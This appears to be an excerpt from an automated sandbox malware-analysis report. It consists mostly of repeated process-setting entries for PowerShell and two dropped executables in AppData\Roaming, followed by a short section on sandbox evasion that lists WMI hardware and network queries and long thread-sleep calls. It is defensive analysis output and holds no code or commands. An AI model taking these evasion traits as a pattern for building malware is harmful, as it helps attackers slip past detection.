                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (26 identical entries)

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 4128 | Thread sleep time: -22136092888451448s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 3504 | Thread sleep count: 9714 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460 | Thread sleep time: -13835058055282155s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5764 | Thread sleep count: 9473 > 30
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1199577s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1199436s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1199296s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1199155s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1199028s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1198890s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1198750s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1198624s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1198500s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1198305s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1198191s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1198046s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1197934s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1197796s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1197640s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1197531s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1197421s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1197296s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1197171s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1197027s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1196889s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1196774s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1196671s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1196548s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1196390s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1196281s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1196171s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1195937s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1195750s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1195636s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1195528s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1195421s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1195312s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1195202s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1195089s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194968s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194859s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194749s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194636s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194530s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194420s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194312s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194201s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1194093s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1193984s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1193869s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1193749s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1193640s >= -30000s
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe TID: 5756 | Thread sleep time: -1193530s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2164 | Thread sleep time: -15679732462653109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 3276 | Thread sleep count: 9713 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4324 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4324 | Thread sleep count: 46 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5792 | Thread sleep count: 9689 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1316 | Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2612 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2612 | Thread sleep count: 46 > 30
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2472 | Thread sleep count: 9680 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1920 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1920 | Thread sleep count: 42 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2692 | Thread sleep count: 9658 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668 | Thread sleep time: -20291418481080494s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2748 | Thread sleep count: 525 > 30
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264 | Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264 | Thread sleep time: -1199711s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264 | Thread sleep time: -1198567s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264 | Thread sleep time: -1198396s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe TID: 2264 | Thread sleep time: -1198009s >= -30000s
